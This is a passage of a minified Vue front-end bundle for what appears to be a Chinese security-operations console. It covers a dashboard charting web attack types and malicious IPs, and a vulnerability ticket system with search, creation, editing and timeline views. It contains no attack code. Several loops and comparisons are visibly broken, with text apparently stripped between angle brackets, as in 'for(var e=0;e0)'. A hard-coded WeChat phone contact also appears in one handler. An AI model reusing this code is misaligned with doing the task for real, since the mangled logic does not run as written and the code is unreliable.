"),e("div",{staticStyle:{float:"right"},attrs:{separator:"/"}},[e("el-radio-group",{staticClass:"doctor-tab",attrs:{size:"small"},on:{change:t.tabSwitch},model:{value:t.calendarInputs.calendar,callback:function(a){t.$set(t.calendarInputs,"calendar",a)},expression:"calendarInputs.calendar"}},[e("el-radio-button",{attrs:{label:"1"}},[t._v("当年")]),e("el-radio-button",{attrs:{label:"2"}},[t._v("近七天")]),e("el-radio-button",{attrs:{label:"3"}},[t._v("当天")])],1)],1),e("div",{ref:"LinechartBox"},[e("ve-line",{ref:"Linechart",staticStyle:{"margin-bottom":"-50px"},attrs:{data:t.chartData1,extend:t.lineExtend}})],1)])],1)])],1),e("el-row",{attrs:{gutter:20}},[e("el-col",{attrs:{span:12}},[e("el-card",{attrs:{shadow:"never"}},[t._v(" Web攻击类型占比 "),e("div",{ref:"ringChartBox"},[e("ve-ring",{ref:"ringChart",staticStyle:{"margin-top":"30px"},attrs:{data:t.chartData,extend:t.chartExtend}})],1)])],1),e("el-col",{attrs:{span:12}},[e("el-card",{attrs:{shadow:"never"}},[t._v(" 恶意IP占比 "),e("div",{ref:"pieChartBox"},[e("ve-pie",{ref:"pieChart",staticStyle:{"margin-top":"30px"},attrs:{data:t.chartData2,extend:t.chartExtend}})],1)])],1)],1),e("el-row",{attrs:{gutter:12}})],1)},s=[],n=(e("b0c0"),e("b775")),o=e("4328"),i=e.n(o);function c(t){return n["a"].post("/dashboard/headerCounts",i.a.stringify(t))}function l(t){return n["a"].post("/dashboard/historyVolatility",i.a.stringify(t))}function u(t){return n["a"].post("/dashboard/attackTypes",i.a.stringify(t))}function d(t){return n["a"].post("/dashboard/maliciousIp",i.a.stringify(t))}var h={data:function(){return this.lineExtend={tooltip:{backgroundColor:"#FFF",color:"black",borderWidth:"1",borderColor:"#bebebe",textStyle:{color:"black"}}},this.chartExtend={tooltip:{backgroundColor:"#FFF",color:"black",borderWidth:"1",borderColor:"#bebebe",textStyle:{color:"black"}},legend:{orient:"vertical",left:"right",top:"top",align:"left"}},{headerCountsVal:{AudiLogs:0,attackNumber:0,auditRequests:0,anomalyNumber:0},DataListData:[],OperatingAttackListData:[],OperatingListData:[],chartData1:{columns:["key","val"],rows:[]},chartData:{columns:["攻击类型","总数"],rows:[]},chartData2:{columns:["攻击源IP","次数"],rows:[]},calendarInputs:{calendar:2}}},created:function(){this.headerCountsAttr(),this.attackAttr(),this.attackTypesAttr(),this.maliciousIpAttr()},mounted:function(){var t=this.$refs.Linechart,a=this.$refs.LinechartBox,r=e("eec4"),s=r({strategy:"scroll"});s.listenTo(a,(function(a){t.echarts.resize()}));var n=this.$refs.ringChart,o=this.$refs.ringChartBox,i=r({strategy:"scroll"});i.listenTo(o,(function(t){n.echarts.resize()}));var c=this.$refs.pieChart,l=this.$refs.pieChartBox;r({strategy:"scroll"});i.listenTo(l,(function(t){c.echarts.resize()}))},methods:{tabSwitch:function(){this.attackAttr()},headerCountsAttr:function(){var t=this;c().then((function(a){if(1===a.status)for(var e=0;e0)for(var r=0;r0)for(var r=0;r1&&e.readModel.vulSourceObject<4?a("el-tag",{attrs:{size:"small"}},[e._v(e._s(e.readModel.vulSourceInfo))]):e._e()],2)],1),a("el-breadcrumb",{staticStyle:{"margin-top":"5px","margin-bottom":"20px"},attrs:{"separator-class":"el-icon-arrow-right"}},[a("el-breadcrumb-item",[e._v("漏洞工单")]),a("el-breadcrumb-item",[e._v("漏洞细节")])],1),a("el-descriptions",{staticClass:"margin-top",staticStyle:{"margin-right":"30px","margin-bottom":"20px"},attrs:{column:1,border:""}},[a("el-descriptions-item",{attrs:{labelStyle:"width: 90px"}},[a("template",{slot:"label"},[e._v(" 漏洞详情 ")]),a("div",{directives:[{name:"viewer",rawName:"v-viewer"}],domProps:{innerHTML:e._s(e.readModel.vulInfo)}})],2),a("el-descriptions-item",[a("template",{attrs:{contentStyle:"width:200px"},slot:"label"},[e._v(" 解决建议 ")]),a("div",{directives:[{name:"viewer",rawName:"v-viewer"}],domProps:{innerHTML:e._s(e.readModel.vulSuggestion)}})],2),a("el-descriptions-item",[a("template",{slot:"label"},[e._v(" 引用文献 ")]),a("div",{directives:[{name:"viewer",rawName:"v-viewer"}],domProps:{innerHTML:e._s(e.readModel.vulReferer)}})],2)],1)],1)],1),a("el-col",{staticStyle:{"margin-left":"-40px"},attrs:{span:8}},[a("el-breadcrumb",{staticStyle:{"margin-top":"28px","margin-left":"40px","margin-bottom":"30px"},attrs:{"separator-class":"el-icon-arrow-right"}},[a("el-breadcrumb-item",[e._v("漏洞工单")]),a("el-breadcrumb-item",[e._v("流转清单")])],1),a("div",{staticClass:"block",staticStyle:{"margin-left":"10px","margin-right":"10px","margin-bottom":"20px"}},[a("el-timeline",e._l(e.readModel.vulTimeLines,(function(t,l){return a("el-timeline-item",{key:l,attrs:{timestamp:t.vulCirculationCreateTime,placement:"top"}},[a("el-card",[a("h4",[e._v(e._s(t.vulCirculationCreateTime))]),a("p",[e._v("变更信息: "+e._s(t.vulCirculationInfo))])])],1)})),1)],1),a("pagination",{directives:[{name:"show",rawName:"v-show",value:e.listInsideQuery.total>9,expression:"listInsideQuery.total > 9"}],staticStyle:{"margin-left":"15px","margin-top":"-10px"},attrs:{total:e.listInsideQuery.total,page:e.listInsideQuery.page,limit:e.listInsideQuery.limit},on:{"update:page":function(t){return e.$set(e.listInsideQuery,"page",t)},"update:limit":function(t){return e.$set(e.listInsideQuery,"limit",t)},pagination:e.vulReadTimeLimt}})],1)],1):e._e(),e.drawerReadStatus?e._e():a("el-row",[a("div",{ref:"dashboardContainer"},[a("el-form",{staticStyle:{"margin-top":"-15px","margin-bottom":"-16px"},attrs:{inline:!0,size:"small",model:e.searchService,"hide-required-asterisk":""}},[a("el-form-item",[a("el-button",{attrs:{type:"primary",icon:"el-icon-plus",size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 新建漏洞工单")])],1),a("el-form-item",[1==e.searchGroup?a("el-button",{attrs:{type:"primary",icon:"el-icon-search",size:"small"},on:{click:e.drawerSearchOpera}},[e._v(" 组合检索")]):e._e()],1),e.searchGroup?e._e():a("el-form-item",[a("el-input",{attrs:{size:"small",placeholder:"请输入漏洞名称"},model:{value:e.searchService.vulName,callback:function(t){e.$set(e.searchService,"vulName",t)},expression:"searchService.vulName"}})],1),e.searchGroup?e._e():a("el-form-item",[a("el-select",{attrs:{size:"small",placeholder:"请选择风险级别"},model:{value:e.searchService.vulLevel,callback:function(t){e.$set(e.searchService,"vulLevel",t)},expression:"searchService.vulLevel"}},[a("el-option",{attrs:{label:"低危",value:"0"}}),a("el-option",{attrs:{label:"中危",value:"1"}}),a("el-option",{attrs:{label:"高危",value:"2"}})],1)],1),a("el-form-item",[e.searchGroup?e._e():a("el-select",{attrs:{size:"small",placeholder:"请选择处置状态"},model:{value:e.searchService.vulDisposeStatus,callback:function(t){e.$set(e.searchService,"vulDisposeStatus",t)},expression:"searchService.vulDisposeStatus"}},[a("el-option",{attrs:{label:"未解决",value:"0"}}),a("el-option",{attrs:{label:"解决中",value:"1"}}),a("el-option",{attrs:{label:"误报忽略",value:"2"}}),a("el-option",{attrs:{label:"已解决",value:"3"}}),a("el-option",{attrs:{label:"白名单",value:"4"}})],1)],1),e.searchGroup?e._e():a("el-form-item",[a("div",{staticClass:"block picker"},[a("el-form-item",[a("el-date-picker",{attrs:{type:"daterange",align:"right","unlink-panels":"","range-separator":"至","start-placeholder":"开始日期","end-placeholder":"结束日期","value-format":"yyyy-MM-dd",clearable:!1,size:"small"},model:{value:e.searchService.vulCreateTime,callback:function(t){e.$set(e.searchService,"vulCreateTime",t)},expression:"searchService.vulCreateTime"}})],1)],1)]),e.searchGroup?e._e():a("el-form-item",[a("el-select",{staticStyle:{"margin-left":"-10px"},attrs:{size:"small",placeholder:"请选择来源"},model:{value:e.searchService.vulSource,callback:function(t){e.$set(e.searchService,"vulSource",t)},expression:"searchService.vulSource"}},[a("el-option",{attrs:{label:"内部",value:"0"}}),a("el-option",{attrs:{label:"第三方",value:"1"}})],1)],1),e.searchGroup?e._e():a("el-form-item",[a("el-button",{attrs:{type:"primary",size:"small",icon:"el-icon-search"},on:{click:e.getList}},[e._v("检索")])],1),a("el-form-item",[a("el-button",{attrs:{type:"danger",size:"small",icon:"el-icon-upload2"},on:{click:e.trade}},[e._v("内部工单联动")])],1),a("el-form-item",[a("el-button",{attrs:{type:"danger",size:"small",icon:"el-icon-upload2"},on:{click:e.trade}},[e._v("跟众测联动")])],1)],1)],1),a("el-table",{directives:[{name:"loading",rawName:"v-loading",value:e.listLoading,expression:"listLoading"}],staticClass:"headers",staticStyle:{width:"auto","margin-top":"10px"},attrs:{data:e.listDataObject.outSideListData,"element-loading-text":"加载中...",size:"small",border:""}},[a("el-table-column",{attrs:{align:"center",label:"漏洞编号",width:"200%"},scopedSlots:e._u([{key:"default",fn:function(t){return[e._v(e._s(t.row.vulId))]}}],null,!1,553977279)}),a("el-table-column",{attrs:{label:"漏洞名称",align:"center",width:"220%"},scopedSlots:e._u([{key:"default",fn:function(t){return[e._v(" "+e._s(t.row.vulName)+" ")]}}],null,!1,351103797)}),a("el-table-column",{attrs:{label:"创建时间",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[e._v(" "+e._s(t.row.vulCreateTime)+" ")]}}],null,!1,2002253699)}),a("el-table-column",{attrs:{label:"解决时间",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[null==t.row.vulSolveTime?a("span",[e._v("未解决")]):a("span",[e._v(e._s(t.row.vulSolveTime))])]}}],null,!1,371125392)}),a("el-table-column",{attrs:{label:"漏洞级别",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[0==t.row.vulLevel?a("span",[a("el-tag",{attrs:{type:"success",size:"mini"}},[e._v("低危")])],1):e._e(),1==t.row.vulLevel?a("span",[a("el-tag",{attrs:{type:"warning",size:"mini"}},[e._v("中危")])],1):e._e(),2==t.row.vulLevel?a("span",[a("el-tag",{attrs:{type:"danger",size:"mini"}},[e._v("高危")])],1):e._e()]}}],null,!1,2199071934)}),a("el-table-column",{attrs:{label:"漏洞来源",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[0==t.row.vulSource?a("span",[a("el-tag",{attrs:{size:"mini"}},[a("i",{staticClass:"el-icon-user-solid"}),e._v("人工")])],1):e._e(),1==t.row.vulSource?a("span",[a("el-tag",{attrs:{size:"mini"}},[a("i",{staticClass:"el-icon-s-tools"}),e._v("工具检测")])],1):e._e(),2==t.row.vulSource?a("span",[a("el-tag",{attrs:{size:"mini"}},[a("i",{staticClass:"el-icon-coordinate"}),e._v("公司名")])],1):e._e(),3==t.row.vulSource?a("span",[a("el-tag",{attrs:{size:"mini"}},[a("i",{staticClass:"el-icon-user"}),e._v("白帽子")])],1):e._e()]}}],null,!1,1183549788)}),a("el-table-column",{attrs:{label:"处置状态",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[0==t.row.vulDisposeStatus?a("span",[e._v(" 未解决 ")]):e._e(),1==t.row.vulDisposeStatus?a("span",[e._v(" 解决中 ")]):e._e(),2==t.row.vulDisposeStatus?a("span",[e._v(" 误报/忽略 ")]):e._e(),3==t.row.vulDisposeStatus?a("span",[e._v(" 已解决 ")]):e._e(),4==t.row.vulDisposeStatus?a("span",[e._v(" 白名单 ")]):e._e()]}}],null,!1,4169317457)}),a("el-table-column",{attrs:{label:"操作",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("div",{staticClass:"grid-content bg-purple-light"},[a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return e.drawerReadOpera(t.row)}}},[e._v("查看")]),a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return e.drawerChangeOpera(t.row)}}},[e._v("修改")])],1)]}}],null,!1,3065834599)})],1),a("div",{staticClass:"row"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:e.listQuery.total>10,expression:"listQuery.total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.listQuery.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getList}})],1)],1),a("el-drawer",{attrs:{visible:e.drawerSearchStatus,direction:e.direction,size:e.searchAlterSize,title:"组合检索漏洞工单"},on:{"update:visible":function(t){e.drawerSearchStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"searchService",staticStyle:{"margin-left":"10px"},attrs:{model:e.searchService,inline:!0,"label-width":"90px"}},[a("el-form-item",{attrs:{label:"漏洞名称 :"}},[a("el-input",{attrs:{placeholder:"请输入漏洞名称",size:"small"},model:{value:e.searchService.vulName,callback:function(t){e.$set(e.searchService,"vulName",t)},expression:"searchService.vulName"}})],1),a("el-form-item",{attrs:{label:"漏洞级别 :"}},[a("el-select",{attrs:{size:"small",placeholder:"请选择风险级别"},model:{value:e.searchService.vulLevel,callback:function(t){e.$set(e.searchService,"vulLevel",t)},expression:"searchService.vulLevel"}},[a("el-option",{attrs:{label:"低危",value:"0"}}),a("el-option",{attrs:{label:"中危",value:"1"}}),a("el-option",{attrs:{label:"高危",value:"2"}})],1)],1),a("el-form-item",{attrs:{label:"漏洞来源 :"}},[a("el-select",{attrs:{size:"small",placeholder:"请选择来源"},model:{value:e.searchService.vulSource,callback:function(t){e.$set(e.searchService,"vulSource",t)},expression:"searchService.vulSource"}},[a("el-option",{attrs:{label:"内部",value:"0"}}),a("el-option",{attrs:{label:"第三方",value:"1"}})],1)],1),a("el-form-item",{attrs:{label:"处置状态 :"}},[a("el-select",{attrs:{size:"small",placeholder:"请选择处置状态"},model:{value:e.searchService.vulDisposeStatus,callback:function(t){e.$set(e.searchService,"vulDisposeStatus",t)},expression:"searchService.vulDisposeStatus"}},[a("el-option",{attrs:{label:"待认领",value:"0"}}),a("el-option",{attrs:{label:"解决中",value:"1"}}),a("el-option",{attrs:{label:"误报忽略",value:"2"}}),a("el-option",{attrs:{label:"已解决",value:"3"}}),a("el-option",{attrs:{label:"白名单",value:"4"}})],1)],1),a("el-form-item",[a("div",{staticClass:"block picker"},[a("el-form-item",{attrs:{label:"日期范围 :"}},[a("el-date-picker",{attrs:{type:"daterange",align:"right","unlink-panels":"","range-separator":"至","start-placeholder":"开始日期","end-placeholder":"结束日期","value-format":"yyyy-MM-dd",clearable:!1,size:"small"},model:{value:e.searchService.vulCreateTime,callback:function(t){e.$set(e.searchService,"vulCreateTime",t)},expression:"searchService.vulCreateTime"}})],1)],1)])],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerSearchOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.getList}},[e._v(" 检索")])],1)],1)]),a("el-drawer",{attrs:{visible:e.drawerCreateStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"新建漏洞工单"},on:{"update:visible":function(t){e.drawerCreateStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"createModel",staticStyle:{"margin-left":"10px"},attrs:{model:e.createModel,inline:!0,"label-width":"90px"}},[a("el-form-item",{attrs:{label:"漏洞名称 :"}},[a("el-input",{attrs:{placeholder:"请输入漏洞名称",size:"small"},model:{value:e.createModel.vulName,callback:function(t){e.$set(e.createModel,"vulName",t)},expression:"createModel.vulName"}})],1),a("el-form-item",{attrs:{label:"漏洞级别 :"}},[a("el-select",{staticStyle:{width:"200px"},attrs:{size:"small",placeholder:"请选择风险级别"},model:{value:e.createModel.vulLevel,callback:function(t){e.$set(e.createModel,"vulLevel",t)},expression:"createModel.vulLevel"}},e._l(e.selectOptions.vulsLevelLists,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),a("el-form-item",{attrs:{label:"漏洞来源 :"}},[a("el-select",{staticStyle:{width:"172px"},attrs:{size:"small",placeholder:"请选择来源对象"},model:{value:e.createModel.vulSourceObject,callback:function(t){e.$set(e.createModel,"vulSourceObject",t)},expression:"createModel.vulSourceObject"}},[a("el-option",{attrs:{label:"人工",value:"0"}}),a("el-option",{attrs:{label:"工具检测",value:"1"}}),a("el-option",{attrs:{label:"白帽子",value:"3"}})],1)],1),a("el-form-item",{attrs:{label:"漏洞特征 :"}},[a("el-select",{staticStyle:{width:"200px"},attrs:{multiple:"","allow-create":"",filterable:"","default-first-option":"","reserve-keyword":"",remote:"","remote-method":e.vulTagSearch,size:"small",placeholder:"请选择/输入标签"},model:{value:e.createModel.vulTags,callback:function(t){e.$set(e.createModel,"vulTags",t)},expression:"createModel.vulTags"}},e._l(e.createModel.vulOptions,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),3==e.createModel.vulSourceObject?a("el-form-item",{attrs:{label:"白帽子名 :"}},[a("el-input",{attrs:{placeholder:"请输入白帽子名称",size:"small"},model:{value:e.createModel.vulSourceInfo,callback:function(t){e.$set(e.createModel,"vulSourceInfo",t)},expression:"createModel.vulSourceInfo"}})],1):e._e(),a("el-form-item",{attrs:{label:"漏洞信息 :"}},[a("mavon-editor",{ref:"md1",staticStyle:{"min-height":"400px","min-width":"800px"},attrs:{boxShadow:!1,codeStyle:"”monokai-sublime“",placeholder:"输入漏洞的信息,越具体越好,方便业务方复现,加快漏洞修复...",toolbars:e.markdownOption,autofocus:!1},on:{imgAdd:e.imgUpLoad1},model:{value:e.createModel.vulInfo,callback:function(t){e.$set(e.createModel,"vulInfo",t)},expression:"createModel.vulInfo"}})],1),a("el-form-item",{attrs:{label:"解决建议 :"}},[a("mavon-editor",{ref:"md2",staticStyle:{"min-height":"400px","min-width":"800px"},attrs:{boxShadow:!1,codeStyle:"”monokai-sublime“",placeholder:"根据漏洞,您根据业务,给的建议解决方案是?",toolbars:e.markdownOption,autofocus:!1},on:{imgAdd:e.imgUpLoad2},model:{value:e.createModel.vulSuggestion,callback:function(t){e.$set(e.createModel,"vulSuggestion",t)},expression:"createModel.vulSuggestion"}})],1),a("el-form-item",{attrs:{label:"引用参考 :"}},[a("mavon-editor",{ref:"md3",staticStyle:{"min-height":"400px","min-width":"800px"},attrs:{boxShadow:!1,codeStyle:"”monokai-sublime“",placeholder:"这个漏洞有哪些可以被参考的材料,让研发有个了解,后续可以避免同类问题再产出。",toolbars:e.markdownOption,autofocus:!1},on:{imgAdd:e.imgUpLoad3},model:{value:e.createModel.vulReferer,callback:function(t){e.$set(e.createModel,"vulReferer",t)},expression:"createModel.vulReferer"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerCreate}},[e._v(" 新建漏洞工单")])],1)],1)]),a("el-drawer",{attrs:{visible:e.drawerChangeStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"修改漏洞工单"},on:{"update:visible":function(t){e.drawerChangeStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"changeModel",staticStyle:{"margin-left":"10px"},attrs:{model:e.changeModel,inline:!0,"label-width":"90px"}},[a("el-form-item",{attrs:{label:"漏洞名称 :"}},[a("el-input",{attrs:{placeholder:"请输入漏洞名称",size:"small"},model:{value:e.changeModel.vulName,callback:function(t){e.$set(e.changeModel,"vulName",t)},expression:"changeModel.vulName"}})],1),a("el-form-item",{attrs:{label:"漏洞级别 :"}},[a("el-select",{staticStyle:{width:"200px"},attrs:{size:"small","reserve-keyword":!0,placeholder:"请选择风险级别"},model:{value:e.changeModel.vulLevel,callback:function(t){e.$set(e.changeModel,"vulLevel",t)},expression:"changeModel.vulLevel"}},e._l(e.selectOptions.vulsLevelLists,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),a("el-form-item",{attrs:{label:"漏洞来源 :"}},[a("el-select",{staticStyle:{width:"172px"},attrs:{size:"small",placeholder:"请选择来源对象"},model:{value:e.changeModel.vulSourceObject,callback:function(t){e.$set(e.changeModel,"vulSourceObject",t)},expression:"changeModel.vulSourceObject"}},e._l(e.selectOptions.vulsSourceObjectLists,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),a("el-form-item",{attrs:{label:"漏洞特征 :"}},[a("el-select",{staticStyle:{width:"200px"},attrs:{multiple:"","allow-create":"",filterable:"","default-first-option":"","reserve-keyword":"",remote:"","remote-method":e.vulTagSearch,size:"small",placeholder:"请选择/输入标签"},model:{value:e.changeModel.vulTags,callback:function(t){e.$set(e.changeModel,"vulTags",t)},expression:"changeModel.vulTags"}},e._l(e.selectOptions.vulOptions,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),3==e.changeModel.vulSourceObject?a("el-form-item",{attrs:{label:"白帽子名 :"}},[a("el-input",{attrs:{placeholder:"请输入白帽子名称",size:"small"},model:{value:e.changeModel.vulSourceInfo,callback:function(t){e.$set(e.changeModel,"vulSourceInfo",t)},expression:"changeModel.vulSourceInfo"}})],1):e._e(),a("el-form-item",{attrs:{label:"漏洞信息 :"}},[a("mavon-editor",{ref:"md1",staticStyle:{"min-height":"400px","min-width":"800px"},attrs:{boxShadow:!1,codeStyle:"”monokai-sublime“",placeholder:"输入漏洞的信息,越具体越好,方便业务方复现,加快漏洞修复...",toolbars:e.markdownOption,autofocus:!1},on:{imgAdd:e.imgUpLoad1},model:{value:e.changeModel.vulInfo,callback:function(t){e.$set(e.changeModel,"vulInfo",t)},expression:"changeModel.vulInfo"}})],1),a("el-form-item",{attrs:{label:"解决建议 :"}},[a("mavon-editor",{ref:"md2",staticStyle:{"min-height":"400px","min-width":"800px"},attrs:{boxShadow:!1,codeStyle:"”monokai-sublime“",placeholder:"根据漏洞,您根据业务,给的建议解决方案是?",toolbars:e.markdownOption,autofocus:!1},on:{imgAdd:e.imgUpLoad2},model:{value:e.changeModel.vulSuggestion,callback:function(t){e.$set(e.changeModel,"vulSuggestion",t)},expression:"changeModel.vulSuggestion"}})],1),a("el-form-item",{attrs:{label:"引用参考 :"}},[a("mavon-editor",{ref:"md3",staticStyle:{"min-height":"400px","min-width":"800px"},attrs:{boxShadow:!1,codeStyle:"”monokai-sublime“",placeholder:"这个漏洞有哪些可以被参考的材料,让研发有个了解,后续可以避免同类问题再产出。",toolbars:e.markdownOption,autofocus:!1},on:{imgAdd:e.imgUpLoad3},model:{value:e.changeModel.vulReferer,callback:function(t){e.$set(e.changeModel,"vulReferer",t)},expression:"changeModel.vulReferer"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerChangeOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerChange}},[e._v(" 修改工单")])],1)],1)])],1)},r=[],i=a("53ca"),s=(a("a15b"),a("e9c4"),a("b64b"),a("333d")),o=a("b775"),n=a("4328"),c=a.n(n);function u(e){return o["a"].post("/vuls/lists",c.a.stringify(e))}function d(e){return o["a"].post("/vuls/add",c.a.stringify(e))}function m(e){return o["a"].post("/vuls/change",c.a.stringify(e))}function v(e){return o["a"].post("/vuls/read",c.a.stringify(e))}function p(e){return o["a"].post("/vuls/delete",c.a.stringify(e))}function h(e){return o["a"].post("/vuls/dispose",c.a.stringify(e))}function g(e){return o["a"].post("/vuls/tags",c.a.stringify(e))}function f(e){return o["a"].post("/vuls/timeline",c.a.stringify(e))}function b(e){return o["a"].post("/cos/uploadimg",e)}var S=a("d4cd"),w=new S,y={name:"",components:{Pagination:s["a"]},props:{},data:function(){return{searchGroup:!1,drawerSearchStatus:!1,listLoading:!1,drawerReadStatus:!1,drawerCreateStatus:!1,drawerChangeStatus:!1,newAlterSize:"51%",searchAlterSize:"33%",searchService:{},listQuery:{page:1,limit:10,total:0},listInsideQuery:{page:1,limit:5,total:0},listDataObject:{outSideListData:[]},markdownOption:{bold:!0,italic:!0,underline:!0,strikethrough:!0,quote:!0,code:!0,imagelink:!0,fullscreen:!0,link:!0,trash:!0,subfield:!0},createModel:{vulOptions:[]},changeModel:{},readModel:{},direction:"rtl",selectOptions:{vulsLevelLists:[{label:"低危",value:0},{label:"中危",value:1},{label:"高危",value:2}],vulsSourceObjectLists:[{label:"人工",value:0},{label:"工具检测",value:1},{label:"白帽子",value:3}],vulOptions:[]}}},computed:{},watch:{},created:function(){},mounted:function(){this.getList();var e=this.$refs.dashboardContainer,t=a("eec4"),l=t({strategy:"scroll"});l.listenTo(e,this.checkDv)},methods:{drawerReadOpera:function(e){this.drawerReadStatus?this.drawerReadStatus=!1:this.vulReadObj(e.id)},vulReadObj:function(e){var t=this;v({Id:e}).then((function(a){1===a.status&&(t.readModel=a.data,t.readModel.vulInfo=w.render(t.readModel.vulInfo),t.readModel.vulReferer=w.render(t.readModel.vulReferer),t.readModel.vulSuggestion=w.render(t.readModel.vulSuggestion),t.vulReadTimeLimt(e))}))},vulReadTimeLimt:function(e){var t=this;this.listInsideQuery["Id"]=e,this.listInsideQuery.pageSize=this.listInsideQuery.limit,f(this.listInsideQuery).then((function(e){1===e.status&&(t.readModel.vulTimeLines=e.data.list,t.listInsideQuery.total=e.data.total,t.listInsideQuery.page=e.data.page,t.drawerReadStatus=!0)}))},drawerDispose:function(e){var t=this;h({Id:this.readModel.id,job:e}).then((function(e){1===e.status&&(t.$message.success("漏洞操作成功!"),t.vulReadObj(t.readModel.id))}))},imgUpLoad1:function(e,t){var a=this,l=new FormData;l.append("file",t),b(l).then((function(t){1===t.status&&a.$refs.md1.$img2Url(e,t.data+"?imageMogr2/thumbnail/!48p")}))},imgUpLoad2:function(e,t){var a=this,l=new FormData;l.append("file",t),b(l).then((function(t){1===t.status&&a.$refs.md2.$img2Url(e,t.data+"?imageMogr2/thumbnail/!48p")}))},imgUpLoad3:function(e,t){var a=this,l=new FormData;l.append("file",t),b(l).then((function(t){1===t.status&&a.$refs.md3.$img2Url(e,t.data+"?imageMogr2/thumbnail/!48p")}))},vulTagSearch:function(e){var t=this;g({tagName:e}).then((function(e){1===e.status&&(t.createModel.vulOptions=e.data)}))},trade:function(){this.$message.info("请联系微信:13825687872")},drawerSearchOpera:function(){this.drawerSearchStatus?this.drawerSearchStatus=!1:this.drawerSearchStatus=!0},drawerCreateOpera:function(){var e=this;g().then((function(t){1===t.status&&(e.createModel.vulOptions=t.data)})),this.drawerCreateStatus?this.drawerCreateStatus=!1:this.drawerCreateStatus=!0},drawerChangeOpera:function(e){var t=this;this.drawerChangeStatus?this.drawerChangeStatus=!1:(g().then((function(e){1===e.status&&(t.changeModel.vulOptions=e.data)})),v({Id:e.id}).then((function(e){if(1===e.status){t.drawerChangeStatus=!0,t.changeModel=e.data;for(var a=[],l=0;l1619?(this.newAlterSize="39%",this.searchAlterSize="39%",this.searchGroup=!1):this.searchGroup=!0},getList:function(){var e=this;this.listLoading=!0;var t={page:this.listQuery.page,pageSize:this.listQuery.limit};if("object"==Object(i["a"])(this.searchService)&&"{}"!=JSON.stringify(this.searchService)){void 0!=this.searchService.vulCreateTime&&(this.searchService.vulStartTIme=this.searchService.vulCreateTime[0],this.searchService.vulEndTime=this.searchService.vulCreateTime[1]);for(var a=Object.keys(this.searchService),l=0;l2)if(u=h(u),t=u.charCodeAt(0),43===t||45===t){if(a=u.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(u.charCodeAt(1)){case 66:case 98:n=2,r=49;break;case 79:case 111:n=8,r=55;break;default:return+u}for(i=u.slice(2),s=i.length,o=0;or)return NaN;return parseInt(i,n)}return+u};if(i(b,!w(" 0o1")||!w("0b1")||w("+0x1"))){for(var S,k=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof k&&(v?d((function(){C.valueOf.call(a)})):l(a)!=b)?u(new w(y(t)),a,k):y(t)},_=n?g(w):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),z=0;_.length>z;z++)o(w,S=_[z])&&!o(k,S)&&m(k,S,p(w,S));k.prototype=C,C.constructor=k,s(r,b,k)}},b775:function(e,t,a){"use strict";a("d3b7");var n=a("bc3a"),r=a.n(n),i=a("5c96"),s=r.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),s.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(i["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=s},c6f7:function(e,t,a){"use strict";a.r(t);var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"dashboard-container"},[a("el-row",[a("el-form",{staticStyle:{"margin-top":"-15px","margin-bottom":"-16px"},attrs:{inline:!0,size:"small","hide-required-asterisk":""}},[a("el-form-item",[a("el-button",{attrs:{type:"primary",icon:"el-icon-plus",size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 